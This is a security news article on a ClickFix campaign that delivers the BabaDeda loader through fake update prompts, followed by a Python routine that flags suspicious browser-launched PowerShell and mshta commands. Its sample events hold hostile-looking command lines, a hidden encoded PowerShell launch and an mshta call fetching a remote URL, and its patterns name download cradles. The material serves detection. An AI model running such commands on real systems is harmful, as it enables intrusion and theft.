Attackers are reviving the BabaDeda loader in a new ClickFix malware campaign that abuses fake software update flows to deliver remote-access tools and information-stealers, according to Morphisec’s latest analysis published Tuesday.
The loader, previously seen in cryptocurrency-themed attacks, is being used to bypass endpoint defenses by hiding inside seemingly legitimate installers and update helpers.
Morphisec said it blocked multiple intrusion attempts in April 2026 and tied the activity to a significantly evolved BabaDeda loader.
The attack starts by tricking users into running attacker-supplied commands through trusted operating system tools, then moves through hidden PowerShell, in-memory shellcode, DLL sideloading and external payload storage.
The payload chain is designed to deliver information stealers and remote-access trojans. Morphisec tied the code to earlier BabaDeda activity through internal naming and constants, including a workflow name and a hexadecimal marker referencing “BABADEDA.”
ClickFix is a social-engineering technique that tricks a user into “fixing” a fake computer problem by copying and running a malicious command. It has become a durable delivery method because it attacks user trust, not only software flaws.
Proofpoint previously said ClickFix campaigns have delivered malware families including AsyncRAT, Danabot, DarkGate, Lumma and NetSupport. The campaign also connects to a pattern SPB has tracked in earlier ClickFix coverage.
The practical defense beyond user training is monitoring for clipboard-to-run behavior, suspicious PowerShell launched from browser-driven workflows, unusual DLL loads, shellcode staged in memory and outbound calls to payload storage after a user follows a “fix” prompt.
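As an added illustration of the detection side described above (this is example code written for this page, not Morphisec's tooling or anything from its report), the following Python triage routine runs the "user-driven launch of a scripting tool with hidden, encoded or download-style arguments" heuristic over a handful of constructed process-creation records. The field names (`parent`, `image`, `cmdline`), the parent-process list and the indicator patterns are assumptions chosen for the example; the sample events are made up and are not indicators from the campaign.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
# Illustrative only: none of these values come from the Morphisec analysis.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc <base64-blob>"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://update-helper.example/verify"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
]

# Parents that indicate a user-driven launch: a browser, or explorer.exe,
# which is the parent when a pasted command is run from the Run dialog (assumption).
USER_DRIVEN_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "explorer.exe"}

# Trusted OS tools commonly abused to execute attacker-supplied commands.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "msiexec.exe", "bitsadmin.exe", "curl.exe"}

# Command-line indicators, evaluated in this order. Each is a heuristic, not a proof.
INDICATOR_PATTERNS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("exec_policy_bypass", re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b", re.I)),
    ("remote_url", re.compile(r"https?://|downloadstring|downloadfile|invoke-webrequest"
                              r"|\biwr\b|invoke-restmethod|\birm\b|net\.webclient", re.I)),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def indicators(cmdline: str) -> list:
    """Names of every indicator pattern present in the command line."""
    return [name for name, pattern in INDICATOR_PATTERNS if pattern.search(cmdline)]


def analyze(event: dict):
    """Return a finding dict when the event matches the ClickFix-style heuristic, else None.

    All three conditions must hold: the child is a scripting/LOLBin tool, the parent
    is a user-driven process (browser or Run dialog), and the command line carries
    at least one suspicious indicator. A plain scripted launch (e.g. -File backup.ps1)
    from explorer.exe is deliberately not flagged.
    """
    parent, child = basename(event["parent"]), basename(event["image"])
    if child not in LOLBINS or parent not in USER_DRIVEN_PARENTS:
        return None
    hits = indicators(event["cmdline"])
    if not hits:
        return None
    return {"parent": parent, "child": child, "indicators": hits, "cmdline": event["cmdline"]}


def scan(events: list) -> list:
    """Run analyze() over a batch of events and keep only the findings."""
    return [finding for finding in map(analyze, events) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding['parent']} -> {finding['child']}: {', '.join(finding['indicators'])}")
```

On the constructed sample this flags the hidden, encoded PowerShell spawned by chrome.exe and the mshta.exe launch from explorer.exe that fetches a remote URL, and leaves the benign scheduled script and the svchost-parented PowerShell alone. In a real deployment the parent list and indicator set need tuning to the environment, and the rule is strongest when correlated with the other signals the article lists: clipboard writes from a browser shortly before the process launch, unexpected DLL loads by the spawned process, and outbound connections to storage services.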